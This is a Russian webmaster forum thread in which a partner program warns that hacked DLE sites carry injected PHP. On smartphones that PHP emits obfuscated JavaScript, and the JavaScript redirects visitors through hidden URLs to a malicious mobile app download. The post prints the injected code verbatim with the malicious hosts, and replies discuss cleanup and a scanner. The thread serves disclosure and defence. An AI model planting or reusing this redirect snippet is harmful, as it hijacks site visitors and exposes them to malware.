- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день.
По сообщению нескольких партнеров нами была проведена проверка и выявлена схема воровства мобильного трафика у вебмастеров. Просим всех проверить свои сайты (в особенности на движке DLE) на наличие вредоносного кода.
{ if ( check_smartphone() ) {echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//".$zip.$wap.$ru."/user/id?14&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"¶\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";
if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) ) {
$config['skin'] = "smartphone";
$smartphone_detected = true;
$config['allow_comments_wysiwyg'] = "no";
}
}
}
Файл с внедренным кодом можно скачать для анализа здесь: http://depositfiles.com/files/27pzvt7zi
Хотелось бы обратить ваше внимание на .$zip.$wap.$ru."/user/id?14&seo\"+\"ref=\"+encodeURIComponent.
В середине файла (строка #206) идет объявление переменных
Функция sttrev делает переворот строки задом наперед
потом при генерации ссылки они подставляются
Выделяем реальный скрываемый URL: http://inclyde.net/user/id?14
Откуда идет редирект на страницу: http://updates.com.download-version-12-build-0002b.kmlfnjruiefrjnxckl9348huv87erndo84nm9fk39iufjdko88yu53.kjcn9wenjc938ufh9we8h873wfhewinhjf3inwiu9efh83bf2hu3ijfbh9ua9.o8o8o.ru/update.html
(скриншот: http://pix.am/uTz8/)
Само скачивание мидлета производится по ссылке: http://flash-plaed-mobile.net/d.php?a=u264r2941315y2w4u2w423m254l2u266x2z244y2742364v2d4
У нас подобных проектов и форматов ссылок нет. Из чего делается вывод, что автор данного скрипта хотел отвести взгляд от решений, с которыми действительно работает, дабы все претензии шли к нам. Но мы бы не смогли заблокировать нарушителя, так как его в нашей системе попросту бы не было.
Последствиями размещения такого незащищенного кода может стать пессимизация ПС и АВ, так как слив идет на блокируемые всеми АВ ссылки, а так же методом, который легко палиться техническими средстами поисковиков.
Просим представителей партнерских программ проверить указанную ссылку и в случае обнаружения мошенника незамедлительно заблокировать его, а так же предоставить информацию о нем в данный топик, дабы вебмастера, которые стали жертвой этого негодяя, могли понять, откуда растут ноги взлома ресурсов.
zipwap_ru, видимо создали темы одновременно :) Незаметное воровство WAP Трафика. Будьте Внимательны!
Все верно, подтверждаю.
http://www.hit-star.ru/ ничего не напоминает?) Include.net например ваш
Такс.. интересно. Заметил на некоторых своих сайтах, когда захожу с моб.телефона, перенаправляет на flash-plaed-mobile.net
На каждом стоит по несколько одинаковых веб-партнерок, думал, может какая-то из них и сливает заодно себе вап-траф. Проверить что да как все времени что-то нет.
Узнаю стиль ссылок партнёрки Вапсист, даже домен ихний. Просьба владельцам Вапсиста, вычислить мошенника, заблокировать и по возможности выложить все данные в топик.
Заметил сегодня, что за прошедший день, трафик на сайте, упал вдвое, посмотрел стату, объективных на это причин не было, позиции те же, не понял из-за чего такой спад. Сейчас, увидел эту тему, и решил с андроид устройства открыть свой сайт, и что же вы думали? Редирект!
Вот сюда редиректит :
Http://browser-31.com/s/7070 (как я понял, /s/7070 это субаккаунт в партнёрке, судя по всему в Пиратах).
В связи с этим, вопрос, как обезопасить свой сайт, от подобного рода ублюдков? Как я понял, взлом был не через фтп , а через дырку в ДЛЕ.
Кто поможет обезопасится?
У некоторых партнёрок есть оплачиваемый слив мобильного трафа как дополнительная "плюшка". Отключается в настройках профиля (по умолчанию, включено). У визард-баннеров, например, и ещё каких-то
gesik, вариант только постоянно мониторить файлы сайта самостоятельно, после чего дополнительно ставить скрипт айболита http://www.revisium.com/ai/, и вычищать что он покажет...
сам страдаю той же проблемой, ломают причем сайты все, не только на дле
у себя замечаю частый слив мобильного трафика на http://mobllers.ru/
как раз сейчас чищу сайтец один на DLE, айболит нашел всё что только можно - несколько шеллов, в ява скрипты напихали редиректов мобильных, даже есть созданные папки с дорвеями все .htaccess файлы на всем сайты заменены, чистить до вечера